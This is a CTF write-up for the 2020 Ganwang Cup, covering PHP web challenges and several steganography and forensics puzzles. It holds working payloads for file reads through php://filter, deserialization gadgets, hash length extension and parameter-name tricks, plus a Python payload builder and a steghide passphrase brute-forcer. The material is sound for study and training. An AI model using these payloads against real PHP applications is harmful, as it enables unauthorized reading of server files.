The 1st Ganwang Cup Cyber Security Competition 2020 (GW-CTF) Writeup

Web

EasyPhp

<?php
$sz_txt = $_GET["sz_txt"];
$sz_file = $_GET["sz_file"];
$password = $_GET["password"];
if(isset($sz_txt)&&(file_get_contents($sz_txt,'r')==="welcome to jxsz")){
    echo "<br><h1>".file_get_contents($sz_txt,'r')."</h1></br>";
    if(preg_match("/flag/",$sz_file)){
        echo "Not now!";
        exit();
    }else{
        include($sz_file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

For $sz_txt, use the data:// or php://input pseudo-protocol so that file_get_contents() returns "welcome to jxsz"; then put a php://filter pseudo-protocol URL in $sz_file to read the source of the included file. The include target is only blacklisted for the word "flag", so useless.php can be read out base64-encoded:

?sz_txt=data:text/plain,welcome to jxsz&sz_file=php://filter/read=convert.base64-encode/resource=useless.php

Base64-decode the output to get the useless.php source:

<?php
class Flag{
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("So cool,continue plz");
        }
    }
}
?>

Construct the deserialization POC: set the $file property directly to the name of the file we want to read. include($sz_file) with sz_file=useless.php loads the Flag class before unserialize() runs, and echo $password then invokes Flag::__toString(), which reads the file. Because $sz_file may not contain "flag", reading flag.php through the object is the way around the include filter.

<?php
class Flag{
    public $file = "flag.php";
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("So cool,continue plz");
        }
    }
}

$res = new Flag();
echo serialize($res);
?>
PS C:\Users\Administrator\Desktop> php .\test.php
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

Capture the request, change it to a POST, and set the GET parameters to: ?sz_txt=php://input&sz_file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

The POST body is: welcome to jxsz


flag{4a5a802f-6a37-44d4-8a49-e9066dfd6474}

parseHash

<?php
include("key.php");
class person{
    public $aa;
    public $bb;
    public $username;
    public $password;
    public function __construct($key=''){
        $this->username="jxsz";
        $this->password="jxsz";
        if(strlen($key)==16&&md5($key . urldecode( $this->username .  $this->password)=="a1133ca71ed6320a0255b0d53188be57")){
            echo "Welcome";
        }
    }

    public function __destruct(){
        $this->aa = (string)$this->aa;
        if(strlen($this->aa) > 5 || strlen($this->bb) > 5||preg_match('/INF|NAN|M_/i', $this->aa)){
            die("no no no");
        }
        if($this->aa !== $this->bb && md5($this->aa) === md5($this->bb) && $this->aa != $this->bb){
            echo file_get_contents("/flag");
        }
    }
}
highlight_file(__FILE__);
$person=new person($key);
$other_pwd=$_POST["pwd1"];
$other_hash=$_POST["hash_code"];
if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
    echo "66666666666";
    unserialize($_GET['sz_sz.sz']);
}

This is a modified version of easytrick from the national competition. It tests three things: a hash length extension attack, passing a parameter whose name is illegal for PHP, and a floating-point precision bypass.

Hash length extension attack

$this->username = "jxsz"
$this->password = "jxsz"
strlen($key) == 16
md5($key . urldecode($this->username . $this->password)) == "a1133ca71ed6320a0255b0d53188be57"

So the known hash is over the 24-byte message $key . "jxsz" . "jxsz". The check we have to pass computes md5($key . "jxsz" . $pwd1), so from the attack's point of view the unknown prefix is $key . "jxsz" (16 + 4 = 20 bytes) and the known tail is the password "jxsz".
Last condition: the submitted string must contain "szxy666", and not at the very start (strpos(...) > 0).

Generate the extended message directly with the hash length extension tool HashPump (signature a1133ca71ed6320a0255b0d53188be57, data "jxsz", key length 20, append "szxy666"). It prints the new hash and the new data:

Hashpump tool address: https://github.com/bwall/HashPump


ec789edf786174babd157da5492e1850
jxsz\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00szxy666

Replace every \x.. byte with its percent-encoded form (\x00 becomes %00, \x80 becomes %80, \xc0 becomes %c0) when submitting the POST. The page printing 66666666666 confirms the hash check was bypassed:

pwd1=jxsz%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00szxy666&hash_code=ec789edf786174babd157da5492e1850

Illegal characters in the name of the GET parameter passed to unserialize()

unserialize($_GET['sz_sz.sz']); 

This relies on how PHP rewrites incoming variable names that contain illegal characters: https://github.com/php/php-src/commit//fc4d462e947828fdbeac6020ac8f34704a218834?branch=fc4d462e947828fdbeac6020ac8f34704a218834&diff=unified

In that code the rewrite of illegal characters in a parameter name happens only once: '.' and spaces are turned into '_' up to the first '[', and if that '[' has no matching ']', the '[' itself is replaced by '_' and the rest of the name is kept verbatim.
The target name here is sz_sz.sz. To stop the '.' from being turned into '_', send the name with '[' in place of the first '_' so that the single replacement is spent on the bracket: sz[sz.sz arrives as sz_sz.sz.

?sz[sz.sz=

What follows is the easytrick approach from the national competition, except that NAN and INF are filtered here. It can still be bypassed with floating-point precision: __destruct() casts $aa to a string with the default precision=14, so the float 5.6000000000000005 becomes "5.6" (3 characters, within the length limit) while $bb stays a float. Then $aa !== $bb (string vs. float), md5($aa) === md5($bb) (md5() converts $bb to the same "5.6"), and $aa != $bb (the loose comparison turns "5.6" into 5.6, which is not equal to 5.6000000000000005) all hold, and /flag is printed. The serialized POC:

<?php
class person{
    public $aa;
    public $bb;
}
$res = new person();
$res->aa = 0.8 * 7;
$res->bb = 7 * 0.8;
echo serialize($res);
?>
PS C:\Users\Administrator\Desktop> php .\test.php
O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}

payload

?sz[sz.sz=O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
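Both POCs above (the Flag object for EasyPhp and the person object here) were generated with PHP itself. The following is an added example, not part of the original writeup, that builds the same payloads without a PHP interpreter: a small serializer for the PHP types used in these challenges (floats follow Python's repr(), which matches PHP's default serialize_precision=-1 for values like these), plus the bracket trick for the sz_sz.sz parameter name. The class name PhpObject and the helper names are this example's own.

```python
from urllib.parse import quote


class PhpObject:
    """A PHP object to serialize: class name plus an ordered dict of public properties.
    (Protected/private properties would need the "\0*\0name" / "\0Class\0name" key forms; not needed here.)"""

    def __init__(self, class_name, props):
        self.class_name = class_name
        self.props = props


def php_serialize(value):
    """Serialize a Python value the way PHP's serialize() does for the types used on this page."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, float):
        # PHP drops the fractional part for integral floats (d:7;) and otherwise prints the
        # shortest round-trip form, which is what repr() gives for ordinary magnitudes.
        return "d:%s;" % (int(value) if value.is_integer() else repr(value))
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode()), value)   # length counts bytes, not characters
    if isinstance(value, (list, dict)):
        items = value.items() if isinstance(value, dict) else enumerate(value)
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in items)
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.class_name), value.class_name, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def easyphp_payload():
    """EasyPhp: Flag::$file is the file __toString() reads when `echo $password` runs."""
    return php_serialize(PhpObject("Flag", {"file": "flag.php"}))


def parsehash_payload():
    """parseHash: a float whose (string) cast at precision=14 ("5.6") differs from its exact value."""
    v = 0.8 * 7   # 5.6000000000000005, not the double nearest to 5.6
    return php_serialize(PhpObject("person", {"aa": v, "bb": v}))


def php_get_name(wanted):
    """Name to send so PHP stores the parameter under `wanted` when `wanted` contains a '.':
    PHP rewrites '.' to '_', but after a '[' with no closing ']' it only turns that '[' into '_'
    and leaves the remainder untouched. Assumes `wanted` has a '_' before its first '.'."""
    i = wanted.index("_")
    return wanted[:i] + "[" + wanted[i + 1:]


def parsehash_query():
    """Full query string for the final step: ?sz[sz.sz=<urlencoded serialized person>."""
    return "?" + php_get_name("sz_sz.sz") + "=" + quote(parsehash_payload())


if __name__ == "__main__":
    print(easyphp_payload())
    print(parsehash_query())
```

The serializer is deliberately limited to scalars, arrays and public-property objects; that covers both gadgets on this page while keeping the byte-length and float rules visible.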


flag{4a1a802f-6b37-44c4-8b49-e9066ddd6474}

Misc

Checkin


flag{welc0me_to_ganwangbei}

face

Lennyfuck interpreter


https://github.com/Knorax/Lennyfuck_interpreter

Replace each Lenny face with its Brainfuck command according to the interpreter's mapping table, which gives:

++++++++++[->++++++++++<]>++.++++++.<+++[->---<]>--.++++++.<++++[->++++<]>++++.<+++++[->-----<]>---------.<++++[->++++<]>++++++.++++++.<++++[->----<]>------.<+++[->+++<]>+++.<+++++[->-----<]>----.<+++++[->+++++<]>++++++++.++++++++.<++++[->----<]>--------.+++.<++++[->++++<]>.<++++[->----<]>-.++++++++.+++++.<+++[->---<]>------.+++++++.-----.++.++.------.<+++++[->-----<]>-----.<++++++[->++++++<]>+++++++++.<+++[->---<]>-.-----.<++++[->----<]>---.<+++++[->+++++<]>.+++++++++..<+++[->+++<]>++.<++++[->----<]>---.<+++[->+++<]>++++++.<++++[->----<]>--.++++++++.<++++[->++++<]>++.<

Online Brainfuck interpreter: https://sange.fi/esoteric/brainfuck/impl/interp/i.html


flag{You_kNow_brain_face_And_Lennyfuck}

DestroyJava

The attachment is an mp4 file. The video is about destroying JAVA and contains no clue. binwalk analysis shows an image embedded in the mp4; extract it with foremost.

This yields a jpg; steghide info shows that the jpg carries an embedded file.

Brute-force the passphrase with a script:

# -*- coding: utf8 -*-
# python3: brute-force the steghide passphrase with a wordlist
import subprocess


def foo():
    stego_file = 'flag.jpg'       # the stego image
    extract_file = 'output.txt'   # file that receives the hidden content
    pass_file = 'password.txt'    # passphrase wordlist

    # strings steghide prints when the passphrase is wrong or the invocation is bad
    errors = ['could not extract', 'steghide --help', 'Syntax error']
    cmd_format = 'steghide extract -sf "%s" -xf "%s" -p "%s"'

    with open(pass_file, 'r', errors='ignore') as f:
        for line in f:
            passphrase = line.strip()
            cmd = cmd_format % (stego_file, extract_file, passphrase)
            p = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
            # the error markers are ASCII, so the console encoding does not matter
            content = p.stdout.decode('utf-8', errors='replace')
            if any(err in content for err in errors):
                continue
            print(content, end='')
            print('the passphrase is %s' % passphrase)
            return


if __name__ == '__main__':
    foo()
    print('ok')

The passphrase turns out to be: password. The extracted hidden file hide.txt contains text that looks like base85:

W^7?+drDz;VP7$GUvy|?Ut&dbbYE;iZfA92XJub$ZeLVrWnXu1a%^OM

Online base85 decoders could not decode it, likely because most of them implement Ascii85, whose alphabet ('!' through 'u') does not contain characters such as '|' and '^' that appear here. Decoding with Python's base64 module (base64.b85decode, the RFC 1924 alphabet) gives the flag:

flag{Java_1s_the_bEst_lAnguage_in_The_world}

Hidepig

pig.pdf contains postpartum care information for sows. The guess is PDF steganography with wbStego4open, but extraction asks for a password. The password is presumably in pig2.pcapng; opening it in Wireshark shows it is USB traffic, so this is USB keyboard traffic analysis.


USB keyboard data package forensic script: https://github.com/WangYihang/UsbKeyboardDataHacker

Run it as described in its README (the script extracts the usb.capdata field with tshark and decodes the keystrokes):

 tshark -r ./example.pcap -T fields -e usb.capdata

python UsbKeyboardDataHacker.py ./pig2.pcapng
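What that script does internally, as an added example that is not the project's code: parse the usb.capdata field as 8-byte boot-protocol keyboard reports (byte 0 is the modifier bitmap, byte 2 the first pressed key), map HID usage IDs to characters, honour Shift and Backspace. The report lines below are constructed for illustration; the real capture and the password it contains are not reproduced in the writeup.

```python
# HID usage ID -> (unshifted, shifted) for the keyboard/keypad usage page.
KEYMAP = {}
for i, ch in enumerate("abcdefghijklmnopqrstuvwxyz"):
    KEYMAP[0x04 + i] = (ch, ch.upper())
for i, (lo, hi) in enumerate(zip("1234567890", "!@#$%^&*()")):
    KEYMAP[0x1E + i] = (lo, hi)
KEYMAP.update({
    0x28: ("\n", "\n"), 0x2B: ("\t", "\t"), 0x2C: (" ", " "),
    0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"), 0x30: ("]", "}"),
    0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'), 0x35: ("`", "~"),
    0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
})
BACKSPACE = 0x2A
SHIFT_MASK = 0x22   # left shift (0x02) | right shift (0x20) in the modifier byte


def parse_capdata_line(line):
    """One tshark usb.capdata value ("00:00:13:00:00:00:00:00" or "0000130000000000") -> bytes."""
    hexstr = line.strip().replace(":", "")
    return bytes.fromhex(hexstr) if hexstr else b""


def decode_keystrokes(lines):
    """Replay keyboard reports and reconstruct the typed text. Non-8-byte records
    (mouse reports, descriptors) are skipped; a zero key byte is a key release."""
    typed = []
    for line in lines:
        report = parse_capdata_line(line)
        if len(report) != 8:
            continue
        mods, key = report[0], report[2]
        if key == 0:
            continue
        if key == BACKSPACE:
            if typed:
                typed.pop()
            continue
        if key in KEYMAP:
            typed.append(KEYMAP[key][1 if mods & SHIFT_MASK else 0])
        else:
            typed.append("<%02x>" % key)   # unmapped usage ID: keep it visible
    return "".join(typed)


# Constructed sample in tshark's usb.capdata format: Shift+p, i, g, Shift+-, x, Backspace,
# 2, 0, 2, 0, Enter, with a release report after each key.
SAMPLE_CAPDATA = """\
02:00:13:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0c:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0a:00:00:00:00:00
00:00:00:00:00:00:00:00
02:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2a:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:28:00:00:00:00:00
00:00:00:00:00:00:00:00
"""

if __name__ == "__main__":
    print(repr(decode_keystrokes(SAMPLE_CAPDATA.splitlines())))
```

To use it on a real capture, feed it the output of the tshark command quoted above (one capdata value per line). Caps Lock and the key slots in bytes 3 to 7 (multiple simultaneous keys) are not handled, which matches the boot-keyboard assumption most of these CTF captures satisfy.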

Then use wbStego4open to extract the hidden file from the pdf.

wbStego4open download address: http://www.bailer.at/wbstego/fs_download.html

Enter the password and select the output file.


flag{pDF_1s_r2a1ly_intEresT1ng}


Original post: blog.csdn.net/mochu7777777/article/details/108449612